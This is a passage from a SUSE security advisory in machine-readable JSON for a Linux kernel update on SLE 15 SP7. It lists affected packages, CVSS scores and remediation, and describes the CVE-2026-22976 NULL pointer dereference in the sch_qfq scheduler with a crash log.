"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71163",
"url": "https://www.suse.com/security/cve/CVE-2025-71163"
},
{
"category": "external",
"summary": "SUSE Bug 1257215 for CVE-2025-71163",
"url": "https://bugzilla.suse.com/1257215"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71163"
},
{
"cve": "CVE-2026-22976",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22976"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset\n\n`qfq_class-\u003eleaf_qdisc-\u003eq.qlen \u003e 0` does not imply that the class\nitself is active.\n\nTwo qfq_class objects may point to the same leaf_qdisc. This happens\nwhen:\n\n1. one QFQ qdisc is attached to the dev as the root qdisc, and\n\n2. another QFQ qdisc is temporarily referenced (e.g., via qdisc_get()\n/ qdisc_put()) and is pending to be destroyed, as in function\ntc_new_tfilter.\n\nWhen packets are enqueued through the root QFQ qdisc, the shared\nleaf_qdisc-\u003eq.qlen increases. At the same time, the second QFQ\nqdisc triggers qdisc_put and qdisc_destroy: the qdisc enters\nqfq_reset() with its own q-\u003eq.qlen == 0, but its class\u0027s leaf\nqdisc-\u003eq.qlen \u003e 0. Therefore, the qfq_reset would wrongly deactivate\nan inactive aggregate and trigger a null-deref in qfq_deactivate_agg:\n\n[ 0.903172] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[ 0.903571] #PF: supervisor write access in kernel mode\n[ 0.903860] #PF: error_code(0x0002) - not-present page\n[ 0.904177] PGD 10299b067 P4D 10299b067 PUD 10299c067 PMD 0\n[ 0.904502] Oops: Oops: 0002 [#1] SMP NOPTI\n[ 0.904737] CPU: 0 UID: 0 PID: 135 Comm: exploit Not tainted 6.19.0-rc3+ #2 NONE\n[ 0.905157] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014\n[ 0.905754] RIP: 0010:qfq_deactivate_agg (include/linux/list.h:992 (discriminator 2) include/linux/list.h:1006 (discriminator 2) net/sched/sch_qfq.c:1367 (discriminator 2) net/sched/sch_qfq.c:1393 (discriminator 2))\n[ 0.906046] Code: 0f 84 4d 01 00 00 48 89 70 18 8b 4b 10 48 c7 c2 ff ff ff ff 48 8b 78 08 48 d3 e2 48 21 f2 48 2b 13 48 8b 30 48 d3 ea 8b 4b 18 0\n\nCode starting with the faulting instruction\n===========================================\n 0:\t0f 84 4d 01 00 00 \tje 0x153\n 6:\t48 89 70 18 \tmov %rsi,0x18(%rax)\n a:\t8b 4b 10 \tmov 0x10(%rbx),%ecx\n d:\t48 c7 c2 ff ff ff ff \tmov $0xffffffffffffffff,%rdx\n 14:\t48 8b 78 08 \tmov 0x8(%rax),%rdi\n 18:\t48 d3 e2 \tshl %cl,%rdx\n 1b:\t48 21 f2 \tand %rsi,%rdx\n 1e:\t48 2b 13 \tsub (%rbx),%rdx\n 21:\t48 8b 30 \tmov (%rax),%rsi\n 24:\t48 d3 ea \tshr %cl,%rdx\n 27:\t8b 4b 18 \tmov 0x18(%rbx),%ecx\n\t...\n[ 0.907095] RSP: 0018:ffffc900004a39a0 EFLAGS: 00010246\n[ 0.907368] RAX: ffff8881043a0880 RBX: ffff888102953340 RCX: 0000000000000000\n[ 0.907723] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 0.908100] RBP: ffff888102952180 R08: 0000000000000000 R09: 0000000000000000\n[ 0.908451] R10: ffff8881043a0000 R11: 0000000000000000 R12: ffff888102952000\n[ 0.908804] R13: ffff888102952180 R14: ffff8881043a0ad8 R15: ffff8881043a0880\n[ 0.909179] FS: 000000002a1a0380(0000) GS:ffff888196d8d000(0000) knlGS:0000000000000000\n[ 0.909572] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 0.909857] CR2: 0000000000000000 CR3: 0000000102993002 CR4: 0000000000772ef0\n[ 0.910247] PKRU: 55555554\n[ 0.910391] Call Trace:\n[ 0.910527] \u003cTASK\u003e\n[ 0.910638] qfq_reset_qdisc (net/sched/sch_qfq.c:357 net/sched/sch_qfq.c:1485)\n[ 0.910826] qdisc_reset (include/linux/skbuff.h:2195 include/linux/skbuff.h:2501 include/linux/skbuff.h:3424 include/linux/skbuff.h:3430 net/sched/sch_generic.c:1036)\n[ 0.911040] __qdisc_destroy (net/sched/sch_generic.c:1076)\n[ 0.911236] tc_new_tfilter (net/sched/cls_api.c:2447)\n[ 0.911447] rtnetlink_rcv_msg (net/core/rtnetlink.c:6958)\n[ 0.911663] ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:6861)\n[ 0.911894] netlink_rcv_skb (net/netlink/af_netlink.c:2550)\n[ 0.912100] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344)\n[ 0.912296] ? __alloc_skb (net/core/skbuff.c:706)\n[ 0.912484] netlink_sendmsg (net/netlink/af\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
